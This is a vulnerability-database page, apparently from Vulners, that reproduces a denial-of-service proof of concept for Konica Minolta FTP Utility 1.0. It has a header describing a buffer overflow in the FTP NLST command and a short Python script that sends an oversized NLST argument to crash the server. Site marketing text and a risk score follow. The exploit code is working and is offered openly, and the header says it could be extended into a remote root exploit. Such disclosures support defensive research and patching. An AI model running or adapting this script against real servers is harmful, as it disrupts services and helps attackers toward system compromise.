Vulners
Lucene search
Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
# Exploit Title: Konica Minolta FTP Utility 1.0 - 'NLST' Denial of Service (PoC)
# Date: 2020-05-16
# Found by: Alvaro J. Gene (Socket_0x03)
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: NLST
# Tested on: Windows 7 SP1
# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers,
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite
# some registers, an individual can use the vulnerable command to build a remote buffer
# overflow exploit that will root a system without any user interaction.
====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) ] ===============
====================================================================================================
from ftplib import FTP
ftp = FTP('192.168.0.16')
buffer = "A" * 1500
ftp.login()
ftp.retrlines('NLST ' + buffer)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 May 2020 00:00Current
7.4High risk
Vulners AI Score7.4